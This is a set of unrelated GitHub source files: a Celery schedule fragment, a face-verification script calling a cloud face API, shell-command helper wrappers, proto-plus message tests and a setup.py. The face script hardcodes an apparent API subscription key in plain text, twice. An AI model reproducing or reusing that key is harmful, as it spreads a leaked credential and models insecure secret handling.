"schedule": crontab(hour=0, minute=30),
},
"school-income-records": {
"task": "app.tasks.autoCreateSchoolIncomeRecord",
"schedule": crontab(minute=39, hour=2, day_of_week='wed'),
},
"mistakes-push": {
"task": "app.tasks.autoNotifyExerciseMistakes",
"schedule": timedelta(minutes=1),
},
},
)
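# Illustrative only: assuming this module is importable as "server" and the app
# is exposed by server/__init__.py, a worker and the beat scheduler could be
# started with commands along the lines of:
#   celery -A server worker -l info
#   celery -A server beat -l info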
if __name__ == "__main__":
celery_app.start()
@celery_app.task(bind=True)
def debug_task(self):
logger.debug('Request: {0!r}'.format(self.request))
| {
"content_hash": "66078957e4619a7b3a85cdfa2549bbfd",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 70,
"avg_line_length": 29.539473684210527,
"alnum_prop": 0.578173719376392,
"repo_name": "malaonline/Server",
"id": "ac1a0cf93c8fd18ad10400fd344b6f2f9133adac",
"size": "2277",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/server/celery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "236251"
},
{
"name": "HTML",
"bytes": "532032"
},
{
"name": "JavaScript",
"bytes": "580515"
},
{
"name": "Python",
"bytes": "987542"
},
{
"name": "Shell",
"bytes": "1881"
}
],
"symlink_target": ""
} |
import requests
import json
#ANNA_KENDRICK_1 = "http://hellogiggles.com/wp-content/uploads/2015/04/10/anna-kendrick-pitch-perfect-650-430.jpg"
#ANNA_KENDRICK_2 = "http://zntent.com/wp-content/uploads/2015/02/Anna-Kendrick-2.jpg"
DETECT_URL = "https://api.projectoxford.ai/face/v1.0/detect?returnFaceId=true&returnFaceLandmarks=false&returnFaceAttributes=age"
VERIFY_URL = "https://api.projectoxford.ai/face/v1.0/verify"
FaceAPIHeaders = {
"Content-Type": "application/json",
"Ocp-Apim-Subscription-Key": "38c44ac804c44f6e97673d815163a1db"
}
TEST_IMAGE = "http://sparck.co/faces/ADAM.jpg"
FACES_DB = {
"JAY":"http://sparck.co/faces/JAY.jpg",
"ADAM":"http://sparck.co/faces/ADAM.jpg",
"ANNA":"http://sparck.co/faces/anna.jpg",
"JAHAN":"http://sparck.co/faces/JAHAN.jpg"
}
#JAY = "http://sparck.co/faces/jay.jpg"
#ANNA = "http://sparck.co/faces/anna.jpg"
#FACES_DB = [JAY, ANNA]
# dictionary of names -> faceIds
faceDict = {}
for key in FACES_DB:
res = requests.post(DETECT_URL, data=json.dumps({"url":FACES_DB[key]}), headers=FaceAPIHeaders)
    # TODO: check that the request succeeded?
detectDict = json.loads(res.content)[0]
faceDict[key] = detectDict["faceId"]
#print(faceDict)
# get TEST_IMAGE faceId
res = requests.post(DETECT_URL, data=json.dumps({"url":TEST_IMAGE}), headers=FaceAPIHeaders)
# TODO: check that the request succeeded?
detectDict = json.loads(res.content)[0]
testImgId = detectDict["faceId"]
# verify faceIds
# dictionary of names -> confidence score
nameScores = {}
for key in faceDict:
res = requests.post(VERIFY_URL, data=json.dumps({"faceId1":testImgId, "faceId2":faceDict[key]}), headers=FaceAPIHeaders)
verifyDict = json.loads(res.content)
nameScores[key] = verifyDict["confidence"]
print(nameScores)
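# Illustrative output shape only (confidence values are made up):
#   {'JAY': 0.11, 'ADAM': 0.92, 'ANNA': 0.07, 'JAHAN': 0.14}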
# detect and get faceIds
#detectURL = "https://api.projectoxford.ai/face/v1.0/detect?returnFaceId=true&returnFaceLandmarks=false&returnFaceAttributes=age"
#FaceAPIHeaders = {
# "Content-Type": "application/json",
# "Ocp-Apim-Subscription-Key": "38c44ac804c44f6e97673d815163a1db"
# }
# res1 = requests.post(detectURL, data=json.dumps({"url":ANNA_KENDRICK_1}), headers=FaceAPIHeaders)
# res2 = requests.post(detectURL, data=json.dumps({"url":ANNA_KENDRICK_2}), headers=FaceAPIHeaders)
# # prints response
# #print(res.content)
# # prints faceId
# detectDict1 = json.loads(res1.content)[0] # for the first line
# print(detectDict1["faceId"])
# detectDict2 = json.loads(res2.content)[0]
# print(detectDict2["faceId"])
# # verify faceIds
# verifyURL = "https://api.projectoxford.ai/face/v1.0/verify"
# res = requests.post(verifyURL, data=json.dumps({"faceId1":detectDict1["faceId"], "faceId2":detectDict2["faceId"]}), headers=FaceAPIHeaders)
# # prints response
# print(res.content)
########################
#NOT USEFUL BELOW HERE
########################
# file object.p
#DATA = open("facescrub_actors.txt", "r")
#nameSet = set()
# def checkValid(arg):
# if arg[0] in nameSet:
# # we already had URL for this name
# return False
# try:
# r = requests.get(arg[3])
# #r = requests.get("asdfasdfdsfsafsaf.com")
# nameSet.add(arg[0])
# return r.status_code == 200
# except requests.exceptions.RequestException:
# return False
# # split on tabs
# res = map((lambda x: x.split("\t")), DATA)
# # filter out invalid URL
# valid = filter(checkValid, res)
# #for data in valid:
# # print(data[3])
# count = 0
# retArray = []
# #nameSet = set()
# for data in valid:
# #if data[0] not in nameSet:
# newDictionary = {}
# newDictionary["name"] = data[0]
# newDictionary["url"] = data[3]
# newDictionary["id"] = count
# retArray.append(newDictionary)
# #nameSet.add(data[0])
# count += 1
# #print(repr(retArray))
# retJSON = json.dumps(retArray, sort_keys=True, indent=4, separators=(",", ": "))
# #print(retJSON)
# f = open("faces.json", "w")
# f.write(retJSON)
# # c = httplib.HTTPConnection('www.example.com')
# # c.request("HEAD", '')
# # if c.getresponse().status == 200:
# # print('web site exists')
# # a = [1,2,3,4]
# # def add1(arg):
# # return arg+1
# # out = map(add1, a)
# # for b in out:
# # print(str(b)) | {
"content_hash": "e12154b23c6515fa52c4d611f8ed8d9b",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 141,
"avg_line_length": 25.46583850931677,
"alnum_prop": 0.6809756097560976,
"repo_name": "jayendrajog/LA-Hacks-2016",
"id": "adfd8594ac8ad7fb2ed436786f90cf1c20a70046",
"size": "4334",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "face_auth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Go",
"bytes": "26936"
},
{
"name": "HTML",
"bytes": "32833"
},
{
"name": "JavaScript",
"bytes": "27884"
},
{
"name": "Makefile",
"bytes": "261"
},
{
"name": "Python",
"bytes": "6298"
}
],
"symlink_target": ""
} |
"""
experipy.system
~~~~~~~~~~~~~~~
This module provides a number of system and shell tools for helping to
specify common tasks within the experipy grammar.
"""
from os import path
from .grammar import Executable
def cd(dirname):
return Executable("cd", [dirname])
def cp(target, dest, opts=[]):
return Executable("cp", opts + ['-R', '-t', dest, target])
def mkdir(dirname, make_parents=False):
opts = []
if make_parents:
opts.append("--parents")
return Executable("mkdir", opts + [dirname])
def mkfifo(pipename):
return Executable("mkfifo", [pipename])
def mv(target, dest):
return Executable("mv", [target, dest])
def rm(*files):
return Executable("rm", ["-rf"] + list(files))
def wait():
return Executable("wait")
def python_script(script, sopts=[], pythonexe="python", **kwargs):
return Executable(pythonexe, [path.abspath(script)] + sopts, **kwargs)
def java_app(jarfile, popts=[], javaexe="java", jopts=[], **kwargs):
jarfile = path.abspath(jarfile)
return Executable(javaexe, jopts + ["-jar", jarfile] + popts, **kwargs)
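# Illustrative usage (script name, options and paths are made up; assumes the
# grammar module renders these Executables into shell commands):
#   run = python_script("train.py", sopts=["--epochs", "5"])
#   backup = cp("results", "/tmp/backup")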
| {
"content_hash": "1526f0abbfec046695c7b3822ff1d7cf",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 75,
"avg_line_length": 23.040816326530614,
"alnum_prop": 0.6359610274579274,
"repo_name": "Elemnir/experipy",
"id": "d3484bd579ec7f9f459039b4bb531879780085a9",
"size": "1129",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/experipy/system.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "27478"
}
],
"symlink_target": ""
} |
import proto
def test_singly_nested_message():
class Foo(proto.Message):
class Bar(proto.Message):
value = proto.Field(proto.INT32, number=1)
bar = proto.Field(proto.MESSAGE, number=1, message=Bar)
foo = Foo(bar=Foo.Bar(value=42))
assert foo.bar.value == 42
def test_multiply_nested_message():
class Foo(proto.Message):
class Bar(proto.Message):
class Baz(proto.Message):
value = proto.Field(proto.INT32, number=1)
baz = proto.Field(proto.MESSAGE, number=1, message=Baz)
bar = proto.Field(proto.MESSAGE, number=1, message=Bar)
foo = Foo(bar=Foo.Bar(baz=Foo.Bar.Baz(value=42)))
assert foo.bar.baz.value == 42
def test_forking_nested_messages():
class Foo(proto.Message):
class Bar(proto.Message):
spam = proto.Field(proto.STRING, number=1)
eggs = proto.Field(proto.BOOL, number=2)
class Baz(proto.Message):
class Bacon(proto.Message):
value = proto.Field(proto.INT32, number=1)
bacon = proto.Field(proto.MESSAGE, number=1, message=Bacon)
bar = proto.Field(proto.MESSAGE, number=1, message=Bar)
baz = proto.Field(proto.MESSAGE, number=2, message=Baz)
foo = Foo(
bar={"spam": "xyz", "eggs": False},
baz=Foo.Baz(bacon=Foo.Baz.Bacon(value=42)),
)
assert foo.bar.spam == "xyz"
assert not foo.bar.eggs
assert foo.baz.bacon.value == 42
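    # Illustrative round trip using proto-plus' serialize/deserialize (sketch only):
    #   wire = Foo.serialize(foo)
    #   assert Foo.deserialize(wire).baz.bacon.value == 42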
| {
"content_hash": "6c5ddec87e86be1165ef4039db0a3234",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 71,
"avg_line_length": 29.74,
"alnum_prop": 0.6086079354404842,
"repo_name": "googleapis/proto-plus-python",
"id": "41af9507f22e3e18e58f4c629967754d082bf352",
"size": "2063",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_message_nested.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "244655"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
from cybots import __version__
setup(
name='{{ cybots }}',
version=__version__,
url='http://host/',
author='TrungAnh',
author_email='[email protected]',
packages=find_packages(),
include_package_data=True,
scripts=['manage.py'],
install_requires=(
'django>1.7',
)
)
| {
"content_hash": "5b4b231fce01fa9be96311fc26e51373",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 43,
"avg_line_length": 19.263157894736842,
"alnum_prop": 0.6120218579234973,
"repo_name": "trungnt13/django_template",
"id": "7c0496894ad30fede4df7f27fb285aa02eb6d348",
"size": "366",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "93"
},
{
"name": "Python",
"bytes": "11659"
},
{
"name": "Shell",
"bytes": "329"
}
],
"symlink_target": ""
} |